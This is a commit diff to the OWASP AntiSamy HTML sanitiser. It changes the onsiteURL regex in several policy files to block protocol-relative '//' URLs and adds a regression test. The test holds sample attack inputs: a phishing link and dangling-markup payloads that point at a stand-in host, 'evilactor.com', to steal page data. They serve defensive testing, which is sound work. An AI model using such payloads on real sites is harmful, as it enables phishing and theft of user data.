nahsra · davewichers · Nov 13, 2020 · Nov 12, 2020 · Nov 12, 2020
diff --git a/src/main/resources/antisamy-anythinggoes.xml b/src/main/resources/antisamy-anythinggoes.xml
@@ -50,7 +50,7 @@ http://www.w3.org/TR/html401/struct/global.html
 		<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
 		<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>
 
-		<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
+		<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
 		<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>
 
 		<regexp name="boolean" value="(true|false)"/>

diff --git a/src/main/resources/antisamy-ebay.xml b/src/main/resources/antisamy-ebay.xml
@@ -48,7 +48,7 @@ http://www.w3.org/TR/html401/struct/global.html
 		<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
 		<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>
 
-		<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
+		<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
 		<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>
 
 		<regexp name="boolean" value="(true|false)"/>

diff --git a/src/main/resources/antisamy-myspace.xml b/src/main/resources/antisamy-myspace.xml
@@ -50,7 +50,7 @@ http://www.w3.org/TR/html401/struct/global.html
 		<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
 		<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>
 
-		<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
+		<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
 		<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>
 
 		<regexp name="boolean" value="(true|false)"/>

diff --git a/src/main/resources/antisamy-slashdot.xml b/src/main/resources/antisamy-slashdot.xml
@@ -34,7 +34,7 @@ Slashdot allowed tags taken from "Reply" page:
 		-->
 
 		<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
-		<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
+		<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
 		<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[~\p{L}\p{N}\p{Zs}\-_\.@\#\$%&amp;;:,\?=/\+!\(\)]*(\s)*"/>
 
 	</common-regexps>

diff --git a/src/main/resources/antisamy-tinymce.xml b/src/main/resources/antisamy-tinymce.xml
@@ -29,7 +29,7 @@
 
 		<!--  force non-empty with a '+' at the end instead of '*'
 		-->
-		<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
+		<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
 
 		<!--  ([\w\\/\.\?=&amp;;\#-~]+|\#(\w)+)
 		-->

diff --git a/src/main/resources/antisamy.xml b/src/main/resources/antisamy.xml
@@ -54,19 +54,19 @@ http://www.w3.org/TR/html401/struct/global.html
 		<regexp name="htmlTitle" value="[\p{L}\p{N}\s\-_',:\[\]!\./\\\(\)&amp;]*"/> <!-- force non-empty with a '+' at the end instead of '*' -->
 		<regexp name="htmlClass" value="[a-zA-Z0-9\s,\-_]+"/>
 
-		<regexp name="onsiteURL" value="^(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
+		<regexp name="onsiteURL" value="^(?!//)(?![\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*(&amp;colon))[\p{L}\p{N}\\\.\#@\$%\+&amp;;\-_~,\?=/!]*"/>
 		<regexp name="anchoredURL" value="#(\w)+"/>
 		<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[\p{L}\p{N}\p{Zs}\.\#@\$%\+&amp;;:\-_~,\?=/!\(\)]*(\s)*"/>
-		
+
 		<regexp name="boolean" value="(true|false)"/>
 		<regexp name="singlePrintable" value="[a-zA-Z0-9]{1}"/> <!-- \w allows the '_' character -->
 
 		<!-- This is for elements (ex: elemName { ... }) -->
 		<regexp name="cssElementSelector" value="[a-zA-Z0-9\-_]+|\*"/>
-		
+
 		<!--  This is to list out any element names that are *not* valid -->
 		<regexp name="cssElementExclusion" value=""/>
-		
+
 		<!--  This if for classes (ex: .className { ... }) -->
 		<regexp name="cssClassSelector" value="\.[a-zA-Z0-9\-_]+"/>
 

diff --git a/src/test/java/org/owasp/validator/html/test/AntiSamyTest.java b/src/test/java/org/owasp/validator/html/test/AntiSamyTest.java
@@ -1425,4 +1425,37 @@ public void testGithubIssue40() throws ScanException, PolicyException {
         assertThat(as.scan(test40, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("<svg onload=alert(1)//")));
         //System.out.println("DOM parser: " + as.scan(test40, policy, AntiSamy.DOM).getCleanHTML());
     }
+
+    @Test
+    public void testGithubIssue48() throws ScanException, PolicyException {
+
+        // Concern is that onsiteURL regex is not safe for URLs that start with //.
+        // For example:  //evilactor.com?param=foo
+
+        final String phishingAttempt = "<a href=\"//evilactor.com/stealinfo?a=xxx&b=xxx\"><span style=\"color:red;font-size:100px\">"
+                + "You must click me</span></a>";
+
+        // Output: <a rel="nofollow"><span style="color: red;font-size: 100.0px;">You must click me</span></a>
+
+        assertThat(as.scan(phishingAttempt, policy, AntiSamy.SAX).getCleanHTML(), not(containsString("//evilactor.com/")));
+        assertThat(as.scan(phishingAttempt, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("//evilactor.com/")));
+
+        // This ones never failed, they're just to prove a dangling markup attack on the following resulting HTML won't work.
+        // Less probable case (steal more tags):
+        final String danglingMarkup = "<div>User input: " +
+                "<input type=\"text\" name=\"input\" value=\"\"><a href='//evilactor.com?"+
+                "\"> all this info wants to be stolen with <i>danlging markup attack</i>" +
+                " until a single quote to close is found'</div>";
+
+        assertThat(as.scan(danglingMarkup, policy, AntiSamy.SAX).getCleanHTML(), not(containsString("//evilactor.com/")));
+        assertThat(as.scan(danglingMarkup, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("//evilactor.com/")));
+
+        // More probable case (steal just an attribute):
+        //      HTML before attack: <input type="text" name="input" value="" data-attribute-to-steal="some value">
+        final String danglingMarkup2 = "<div>User input: " +
+                "<input type=\"text\" name=\"input\" value=\"\" data-attribute-to-steal=\"some value\">";
+
+        assertThat(as.scan(danglingMarkup2, policy, AntiSamy.SAX).getCleanHTML(), not(containsString("//evilactor.com/")));
+        assertThat(as.scan(danglingMarkup2, policy, AntiSamy.DOM).getCleanHTML(), not(containsString("//evilactor.com/")));
+    }
 }